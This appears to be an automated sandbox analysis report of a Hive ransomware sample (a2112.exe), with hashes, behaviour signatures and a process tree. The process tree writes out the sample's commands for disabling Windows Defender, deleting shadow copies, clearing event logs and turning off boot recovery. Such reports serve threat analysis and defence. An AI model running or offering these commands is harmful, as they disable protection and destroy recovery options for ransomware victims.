Analysis

  • max time kernel
    150s
  • max time network
    120s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    03-08-2021 01:31

General

  • Target

    a2112.exe

  • Size

    919KB

  • MD5

    4cd42e7aac7f89edf5764b699b2800d0

  • SHA1

    f309daa9650485d6ef6ceeccdc8c014d425a00fd

  • SHA256

    67ab2abe18b060275763e1d0c73d27c1e61b69097232ed9d048d41760a4533ef

  • SHA512

    0dcf0a9f4b15a355c3da11fbcd2276e9d96bd7b767c3cc2cdf17e3fc0b47483f3ef7f6953fd0ca232c3e9a8603be34b0f6c9d41eaac32ffff66755d8d2400440

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Stops running service(s) 3 TTPs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a2112.exe
    "C:\Users\Admin\AppData\Local\Temp\a2112.exe"
    1⤵
    • Modifies extensions of user files
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:636
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c LhY5kBPeHs.bat >NUL 2>NUL
      2⤵
        PID:2736
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c LhY5kBPeHs.bat >NUL 2>NUL
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2288
        • C:\Windows\system32\sc.exe
          sc stop "LanmanWorkstation"
          3⤵
            PID:1276
          • C:\Windows\system32\sc.exe
            sc stop "SamSs"
            3⤵
              PID:2316
            • C:\Windows\system32\sc.exe
              sc stop "SDRSVC"
              3⤵
                PID:2296
              • C:\Windows\system32\sc.exe
                sc stop "SstpSvc"
                3⤵
                  PID:2132
                • C:\Windows\system32\sc.exe
                  sc stop "UI0Detect"
                  3⤵
                    PID:1152
                  • C:\Windows\system32\sc.exe
                    sc stop "vmicvss"
                    3⤵
                      PID:816
                    • C:\Windows\system32\sc.exe
                      sc stop "VSS"
                      3⤵
                        PID:2256
                      • C:\Windows\system32\sc.exe
                        sc stop "wbengine"
                        3⤵
                          PID:4064
                        • C:\Windows\system32\sc.exe
                          sc stop "WebClient"
                          3⤵
                            PID:4032
                          • C:\Windows\system32\sc.exe
                            sc stop "UnistoreSvc_130b0"
                            3⤵
                              PID:3148
                            • C:\Windows\system32\sc.exe
                              sc delete "LanmanWorkstation"
                              3⤵
                                PID:2068
                              • C:\Windows\system32\sc.exe
                                sc delete "SamSs"
                                3⤵
                                  PID:3872
                                • C:\Windows\system32\sc.exe
                                  sc delete "SDRSVC"
                                  3⤵
                                    PID:812
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SstpSvc"
                                    3⤵
                                      PID:3032
                                    • C:\Windows\system32\sc.exe
                                      sc delete "UI0Detect"
                                      3⤵
                                        PID:380
                                      • C:\Windows\system32\sc.exe
                                        sc delete "vmicvss"
                                        3⤵
                                          PID:3648
                                        • C:\Windows\system32\sc.exe
                                          sc delete "VSS"
                                          3⤵
                                            PID:1868
                                          • C:\Windows\system32\sc.exe
                                            sc delete "wbengine"
                                            3⤵
                                              PID:3936
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WebClient"
                                              3⤵
                                                PID:3728
                                              • C:\Windows\system32\sc.exe
                                                sc delete "UnistoreSvc_130b0"
                                                3⤵
                                                  PID:200
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                  3⤵
                                                    PID:724
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                    3⤵
                                                      PID:2500
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                      3⤵
                                                        PID:1844
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                        3⤵
                                                          PID:916
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                          3⤵
                                                            PID:1016
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                            3⤵
                                                              PID:1964
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                              3⤵
                                                                PID:196
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                3⤵
                                                                  PID:2672
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                  3⤵
                                                                    PID:2376
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                    3⤵
                                                                      PID:2560
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                      3⤵
                                                                        PID:3992
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                        3⤵
                                                                          PID:1572
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                          3⤵
                                                                            PID:1264
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                            3⤵
                                                                              PID:2100
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                              3⤵
                                                                                PID:1928
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                3⤵
                                                                                  PID:1152
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                  3⤵
                                                                                    PID:2272
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                    3⤵
                                                                                      PID:1104
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                      3⤵
                                                                                        PID:3264
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                        3⤵
                                                                                          PID:3148
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                          3⤵
                                                                                            PID:3960
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                            3⤵
                                                                                              PID:3888
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                              3⤵
                                                                                                PID:696
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                3⤵
                                                                                                  PID:380
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                  3⤵
                                                                                                    PID:1912
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                    3⤵
                                                                                                      PID:3180
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                      3⤵
                                                                                                        PID:2888
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                        3⤵
                                                                                                          PID:200
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                          3⤵
                                                                                                            PID:724
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                            3⤵
                                                                                                              PID:2500
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                              3⤵
                                                                                                                PID:1844
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                3⤵
                                                                                                                  PID:916
                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                                  3⤵
                                                                                                                  • Interacts with shadow copies
                                                                                                                  PID:1016
                                                                                                                • C:\Windows\system32\wevtutil.exe
                                                                                                                  wevtutil cl system
                                                                                                                  3⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3520
                                                                                                                • C:\Windows\system32\wevtutil.exe
                                                                                                                  wevtutil cl security
                                                                                                                  3⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2892
                                                                                                                • C:\Windows\system32\wevtutil.exe
                                                                                                                  wevtutil cl application
                                                                                                                  3⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:196
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  wmic SHADOWCOPY /nointeractive
                                                                                                                  3⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2660
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  wmic shadowcopy delete
                                                                                                                  3⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1156
                                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                  3⤵
                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                  PID:2100
                                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                                  bcdedit /set {default} recoveryenabled no
                                                                                                                  3⤵
                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                  PID:1928
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                  3⤵
                                                                                                                    PID:1152
                                                                                                                    • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                      4⤵
                                                                                                                      • Deletes Windows Defender Definitions
                                                                                                                      PID:3676
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                                    3⤵
                                                                                                                      PID:3812
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                                        4⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:4032
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                                      3⤵
                                                                                                                        PID:820
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                                          4⤵
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:1420
                                                                                                                  • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\fwdM_HOW_TO_DECRYPT.txt
                                                                                                                    1⤵
                                                                                                                    • Opens file in notepad (likely ransom note)
                                                                                                                    PID:4212

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • memory/1420-239-0x000001EA5D853000-0x000001EA5D855000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1420-237-0x000001EA5D850000-0x000001EA5D852000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1420-241-0x000001EA5D856000-0x000001EA5D858000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1420-259-0x000001EA5D858000-0x000001EA5D859000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4032-191-0x000001F7E4B10000-0x000001F7E4B11000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4032-235-0x000001F7CA4E8000-0x000001F7CA4E9000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4032-213-0x000001F7CA4E6000-0x000001F7CA4E8000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/4032-192-0x000001F7CA4E3000-0x000001F7CA4E5000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/4032-190-0x000001F7CA4E0000-0x000001F7CA4E2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/4032-185-0x000001F7E4960000-0x000001F7E4961000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB